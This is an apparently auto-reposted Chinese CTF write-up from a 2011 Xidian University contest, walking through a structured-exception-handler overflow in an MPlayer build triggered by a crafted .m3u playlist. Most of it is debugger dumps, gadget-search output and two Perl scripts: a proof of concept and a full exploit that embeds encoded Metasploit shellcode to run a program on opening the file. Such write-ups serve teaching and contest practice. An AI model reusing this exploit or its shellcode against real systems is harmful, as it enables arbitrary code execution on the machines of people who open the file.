0022fd40 46 73 31 46 73 32 46 73-33 46 73 34 46 73 35 46 Fs1Fs2Fs3Fs4Fs5F
0022fd50 73 36 46 73 37 46 73 38-46 73 39 46 74 30 46 74 s6Fs7Fs8Fs9Ft0Ft
0:000>
0022fd60 31 46 74 32 46 74 33 46-74 34 46 74 35 46 74 36 1Ft2Ft3Ft4Ft5Ft6
0022fd70 46 74 37 46 74 38 46 74-39 46 75 30 46 75 31 46 Ft7Ft8Ft9Fu0Fu1F
0022fd80 75 32 46 75 33 46 75 34-46 75 35 46 75 36 46 75 u2Fu3Fu4Fu5Fu6Fu
0022fd90 37 46 75 38 46 75 39 46-76 30 46 76 31 46 76 32 7Fu8Fu9Fv0Fv1Fv2
0022fda0 46 76 33 46 76 34 46 76-35 46 76 36 46 76 37 46 Fv3Fv4Fv5Fv6Fv7F
0022fdb0 76 38 46 76 39 46 77 30-46 77 31 46 77 32 46 77 v8Fv9Fw0Fw1Fw2Fw
0022fdc0 33 46 77 34 46 77 35 46-77 36 46 77 37 46 77 38 3Fw4Fw5Fw6Fw7Fw8
0022fdd0 46 77 39 46 78 30 46 78-31 46 78 32 46 78 33 46 Fw9Fx0Fx1Fx2Fx3F
0:000>
0022fde0 78 34 46 78 35 46 78 36-46 78 37 46 78 38 46 78 x4Fx5Fx6Fx7Fx8Fx
0022fdf0 39 46 79 30 46 79 31 46-79 32 46 79 33 46 79 34 9Fy0Fy1Fy2Fy3Fy4
0022fe00 46 79 35 46 79 36 46 79-37 46 79 38 46 79 39 46 Fy5Fy6Fy7Fy8Fy9F
0022fe10 7a 30 46 7a 31 46 7a 32-46 7a 33 46 7a 34 46 7a z0Fz1Fz2Fz3Fz4Fz
0022fe20 35 46 7a 36 46 7a 37 46-7a 38 46 7a 39 47 61 30 5Fz6Fz7Fz8Fz9Ga0
0022fe30 47 61 31 47 61 32 47 61-33 47 61 34 47 61 35 47 Ga1Ga2Ga3Ga4Ga5G
0022fe40 61 36 47 61 37 47 61 38-47 61 39 47 62 30 47 62 a6Ga7Ga8Ga9Gb0Gb
0022fe50 31 47 62 32 47 62 33 47-62 34 47 62 35 47 62 36 1Gb2Gb3Gb4Gb5Gb6
0:000>
0022fe60 47 62 37 47 62 38 47 62-39 47 63 30 47 63 31 47 Gb7Gb8Gb9Gc0Gc1G
0022fe70 63 32 47 63 33 47 63 34-47 63 35 47 63 36 47 63 c2Gc3Gc4Gc5Gc6Gc
0022fe80 37 47 63 38 47 63 39 47-64 30 47 64 31 47 64 32 7Gc8Gc9Gd0Gd1Gd2
0022fe90 47 64 33 47 64 34 47 64-35 47 64 36 47 64 37 47 Gd3Gd4Gd5Gd6Gd7G
0022fea0 64 38 47 64 39 47 65 30-47 65 31 47 65 32 47 65 d8Gd9Ge0Ge1Ge2Ge
0022feb0 33 47 65 34 47 65 35 47-65 36 47 65 37 47 65 38 3Ge4Ge5Ge6Ge7Ge8
0022fec0 47 65 39 47 66 30 47 66-31 47 66 32 47 66 33 47 Ge9Gf0Gf1Gf2Gf3G
0022fed0 66 34 47 66 35 47 66 36-47 66 37 47 66 38 47 66 f4Gf5Gf6Gf7Gf8Gf
0:000>
0022fee0 39 47 67 30 47 67 31 47-67 32 47 67 33 47 67 34 9Gg0Gg1Gg2Gg3Gg4
0022fef0 47 67 35 47 67 36 47 67-37 47 67 38 47 67 39 47 Gg5Gg6Gg7Gg8Gg9G
0022ff00 68 30 47 68 31 47 68 32-47 68 33 47 68 34 47 68 h0Gh1Gh2Gh3Gh4Gh
0022ff10 35 47 68 36 47 68 37 47-68 38 47 68 39 47 69 30 5Gh6Gh7Gh8Gh9Gi0
0022ff20 47 69 31 47 69 32 47 69-33 47 69 34 47 69 35 47 Gi1Gi2Gi3Gi4Gi5G
0022ff30 69 36 47 69 37 47 69 38-47 69 39 47 6a 30 47 6a i6Gi7Gi8Gi9Gj0Gj
0022ff40 31 47 6a 32 47 6a 33 47-6a 34 47 6a 35 47 6a 36 1Gj2Gj3Gj4Gj5Gj6
0022ff50 47 6a 37 47 6a 38 47 6a-39 47 6b 30 47 6b 31 47 Gj7Gj8Gj9Gk0Gk1G
0:000>
0022ff60 6b 32 47 6b 33 47 6b 34-47 6b 35 47 6b 36 47 6b k2Gk3Gk4Gk5Gk6Gk
0022ff70 37 47 6b 38 47 6b 39 47-6c 30 47 6c 31 47 6c 32 7Gk8Gk9Gl0Gl1Gl2
0022ff80 47 6c 33 47 6c 34 47 6c-35 47 6c 36 47 6c 37 47 Gl3Gl4Gl5Gl6Gl7G
0022ff90 6c 38 47 6c 39 47 6d 30-47 6d 31 47 6d 32 47 6d l8Gl9Gm0Gm1Gm2Gm
0022ffa0 33 47 6d 34 47 6d 35 47-6d 36 47 6d 37 47 6d 38 3Gm4Gm5Gm6Gm7Gm8
0022ffb0 47 6d 39 47 6e 30 47 6e-31 47 6e 32 47 6e 33 47 Gm9Gn0Gn1Gn2Gn3G
0022ffc0 6e 34 47 6e 35 47 6e 36-47 6e 37 47 6e 38 47 6e n4Gn5Gn6Gn7Gn8Gn
0022ffd0 39 47 6f 30 47 6f 31 47-6f 32 47 6f 33 47 6f 34 9Go0Go1Go2Go3Go4
0:000>
0022ffe0 47 6f 35 47 6f 36 47 6f-37 47 6f 38 47 6f 39 47 Go5Go6Go7Go8Go9G
0022fff0 70 30 47 70 31 47 70 32-47 70 33 47 70 34 47 70 p0Gp1Gp2Gp3Gp4Gp
现在先来构造一个简单的poc:
“/x90″ x 5115 + “/xeb/x06/x90/x90″ + [pop pop ret] + “/x90/x90/x90/xcc”
在程序的自身的dll中,没装od的 插件就先不管safeseh的事情了。
Executable search path is:
ModLoad: 00400000 00b26000 image00400000
ModLoad: 7c920000 7c9b6000 ntdll.dll
ModLoad: 7c800000 7c91d000 C:/WINDOWS/system32/kernel32.dll
ModLoad: 6ad40000 6b72e000 C:/Documents and Settings/Administrator/桌面/xdcsc2011/xdcsc2011/漏洞挖掘/mplayer/mplayer_release/mplayer/avcodec-52.dll
ModLoad: 00bd0000 00bfa000 C:/Documents and Settings/Administrator/桌面/xdcsc2011/xdcsc2011/漏洞挖掘/mplayer/mplayer_release/mplayer/avutil-50.dll
ModLoad: 77be0000 77c38000 C:/WINDOWS/system32/msvcrt.dll
ModLoad: 62480000 62492000 C:/Documents and Settings/Administrator/桌面/xdcsc2011/xdcsc2011/漏洞挖掘/mplayer/mplayer_release/mplayer/pthreadGC2.dll
ModLoad: 71a40000 71a4b000 C:/WINDOWS/system32/WSOCK32.DLL
ModLoad: 71a20000 71a37000 C:/WINDOWS/system32/WS2_32.dll
ModLoad: 71a10000 71a18000 C:/WINDOWS/system32/WS2HELP.dll
ModLoad: 77da0000 77e49000 C:/WINDOWS/system32/ADVAPI32.dll
ModLoad: 77e50000 77ee2000 C:/WINDOWS/system32/RPCRT4.dll
ModLoad: 77fc0000 77fd1000 C:/WINDOWS/system32/Secur32.dll
ModLoad: 64940000 649f6000 C:/Documents and Settings/Administrator/桌面/xdcsc2011/xdcsc2011/漏洞挖掘/mplayer/mplayer_release/mplayer/avformat-52.dll
ModLoad: 6d080000 6d0b0000 C:/Documents and Settings/Administrator/桌面/xdcsc2011/xdcsc2011/漏洞挖掘/mplayer/mplayer_release/mplayer/postproc-51.dll
ModLoad: 6d780000 6d7db000 C:/Documents and Settings/Administrator/桌面/xdcsc2011/xdcsc2011/漏洞挖掘/mplayer/mplayer_release/mplayer/swscale-0.dll
ModLoad: 77180000 77283000 C:/WINDOWS/WinSxS/X86_Microsoft.Windows.Common-Controls_6595b64144ccf1df_6.0.2600.3744_x-ww_d9c64cc6/COMCTL32.DLL
ModLoad: 77ef0000 77f38000 C:/WINDOWS/system32/GDI32.dll
ModLoad: 77d10000 77d9f000 C:/WINDOWS/system32/USER32.dll
……
使用神器msfpescan找pop pop ret 的跳转地址
root@scan:~/Desktop# /opt/metasploit/app/msfpescan -p avcodec-52.dll
[avcodec-52.dll]
0x6ad410b4 pop ebx; pop ebp; ret
0x6ad42838 pop edi; pop ebp; ret
0x6ad42a8e pop edi; pop ebp; ret
0x6ad42c5d pop edi; pop ebp; ret
0x6ad43304 pop edi; pop ebp; ret
0x6ad4340f pop edi; pop ebp; ret
0x6ad44d17 pop edi; pop ebp; ret
0x6ad44e8c pop edi; pop ebp; ret
0x6ad44eae pop edi; pop ebp; ret
0x6ad45048 pop edi; pop ebp; ret
0x6ad45093 pop edi; pop ebp; ret
0x6ad45128 pop edi; pop ebp; ret
0x6ad453cc pop edi; pop ebp; ret
有了跳转地址我们就来写poc。
#!/usr/bin/perl
# 2011西安电子科技大学网络攻防大赛 漏洞挖掘题目 poc
# by c4rp3nt3r@0x50sec.org
#
my $junk = "/x90" x 5115;
my $nseh = "/xeb/x06/x90/x90";
my $seh = pack('V',0x6ad410b4); #pop pop ret from avcodec-52.dll
my $payload = "/x90/x90/x90/xcc" ;
open($FH,">poc.m3u");
print $FH $junk.$nseh.$seh.$payload."/r/n";
close($FH);
运行程序,把生成的“poc.m3u”托进程序发现poc成功运行。
0:000> g
ModLoad: 76300000 7631d000 C:/WINDOWS/system32/IMM32.DLL
ModLoad: 62c20000 62c29000 C:/WINDOWS/system32/LPK.DLL
ModLoad: 73fa0000 7400b000 C:/WINDOWS/system32/USP10.dll
ModLoad: 10000000 10035000 C:/Documents and Settings/Administrator/桌面/xdcsc2011/xdcsc2011/漏洞挖掘/mplayer/mplayer_release/mplayer/unrar.dll
ModLoad: 74680000 746cb000 C:/WINDOWS/system32/MSCTF.dll
ModLoad: 77bd0000 77bd8000 C:/WINDOWS/system32/version.dll
ModLoad: 73640000 7366e000 C:/WINDOWS/system32/msctfime.ime
ModLoad: 5adc0000 5adf7000 C:/WINDOWS/system32/uxtheme.dll
ModLoad: 5adc0000 5adf7000 C:/WINDOWS/system32/UxTheme.dll
(894.cec): Access violation – code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=00000000 ebx=0022eab4 ecx=ffffffff edx=0022e6c0 esi=7ffdfbf8 edi=90909090
eip=7c921278 esp=0022e6ac ebp=0022e6c8 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246
ntdll!RtlInitAnsiString+0x1b:
7c921278 f2ae repne scas byte ptr es:[edi]
0:000> g
(894.cec): Break instruction exception – code 80000003 (first chance)
eax=00000000 ebx=7c9232a8 ecx=6ad410b4 edx=7c9232bc esi=00000000 edi=00000000
eip=0022ffeb esp=0022e2e8 ebp=0022e3c4 iopl=0 nv up ei pl zr na pe nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000246
<Unloaded_eme.dll>+0x22ffea:
0022ffeb cc int 3
0:000> d eip-4
0022ffe7 6a 90 90 90 cc 31 00 00-00 00 00 00 00 00 00 00 j….1……….
0022fff7 00 40 11 40 00 00 00 00-00 41 63 74 78 20 00 00 .@.@…..Actx ..
00230007 00 01 00 00 00 b8 24 00-00 c4 00 00 00 00 00 00 ……$………
00230017 00 20 00 00 00 00 00 00-00 14 00 00 00 01 00 00 . …………..
00230027 00 06 00 00 00 34 00 00-00 14 01 00 00 01 00 00 …..4……….
00230037 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00 …………….
00230047 00 00 00 00 00 02 00 00-00 00 00 00 00 00 00 00 …………….
00230057 00 00 00 00 00 14 02 00-00 9c 01 00 00 00 00 00 …………….
0:000> d eip-40
0022ffab 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 …………….
0022ffbb 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 …………….
0022ffcb 90 90 90 90 90 90 90 90-90 90 90 90 90 90 90 90 …………….
0022ffdb 90 90 90 90 90 eb 06 90-90 b4 10 d4 6a 90 90 90 …………j…
0022ffeb cc 31 00 00 00 00 00 00-00 00 00 00 00 40 11 40 .1………..@.@
0022fffb 00 00 00 00 00 41 63 74-78 20 00 00 00 01 00 00 …..Actx ……
0023000b 00 b8 24 00 00 c4 00 00-00 00 00 00 00 20 00 00 ..$………. ..
0023001b 00 00 00 00 00 14 00 00-00 01 00 00 00 06 00 00 …………….
好吧现在就写一个能够弹计算器的exploit,safeseh和dep就先不管了。dep用rop绕过就行了,又不是真的比赛这里就不玩了。
#!/usr/bin/perl
# 2011西安电子科技大学网络攻防大赛 漏洞挖掘题目 seh exploit
# by c4rp3nt3r@0x50sec.org
#
# windows/exec - 223 bytes
# http://www.metasploit.com
# Encoder: x86/shikata_ga_nai
# VERBOSE=false, PrependMigrate=false, EXITFUNC=process,
# CMD=calc
my $load =
"/xba/xa3/xfd/xdd/x88/xd9/xf7/xd9/x74/x24/xf4/x5f/x31/xc9" .
"/xb1/x32/x31/x57/x12/x83/xef/xfc/x03/xf4/xf3/x3f/x7d/x06" .
"/xe3/x49/x7e/xf6/xf4/x29/xf6/x13/xc5/x7b/x6c/x50/x74/x4c" .
"/xe6/x34/x75/x27/xaa/xac/x0e/x45/x63/xc3/xa7/xe0/x55/xea" .
"/x38/xc5/x59/xa0/xfb/x47/x26/xba/x2f/xa8/x17/x75/x22/xa9" .
"/x50/x6b/xcd/xfb/x09/xe0/x7c/xec/x3e/xb4/xbc/x0d/x91/xb3" .
"/xfd/x75/x94/x03/x89/xcf/x97/x53/x22/x5b/xdf/x4b/x48/x03" .
"/xc0/x6a/x9d/x57/x3c/x25/xaa/xac/xb6/xb4/x7a/xfd/x37/x87" .
"/x42/x52/x06/x28/x4f/xaa/x4e/x8e/xb0/xd9/xa4/xed/x4d/xda" .
"/x7e/x8c/x89/x6f/x63/x36/x59/xd7/x47/xc7/x8e/x8e/x0c/xcb" .
"/x7b/xc4/x4b/xcf/x7a/x09/xe0/xeb/xf7/xac/x27/x7a/x43/x8b" .
"/xe3/x27/x17/xb2/xb2/x8d/xf6/xcb/xa5/x69/xa6/x69/xad/x9b" .
"/xb3/x08/xec/xf1/x42/x98/x8a/xbc/x45/xa2/x94/xee/x2d/x93" .
"/x1f/x61/x29/x2c/xca/xc6/xc5/x66/x57/x6e/x4e/x2f/x0d/x33" .
"/x13/xd0/xfb/x77/x2a/x53/x0e/x07/xc9/x4b/x7b/x02/x95/xcb" .
"/x97/x7e/x86/xb9/x97/x2d/xa7/xeb/xfb/xb0/x3b/x77/xfc";
$length = 5115 - length($load);
my $junk = "/x90" x $length;
my $nseh = "/xeb/x06/x90/x90";
my $seh = pack('V',0x6ad410b4); #pop pop ret from avcodec-52.dll
my $pay = "/xe9/x0c/xff/xff/xff" ; # jmp back to shellcode
open($FH,">exp.m3u");
print $FH $junk.$load.$nseh.$seh.$pay."/r/n";
close($FH);
打开构造的exp.m3u会弹出期待的计算器。
该文章由WP-AutoPost插件自动采集发布
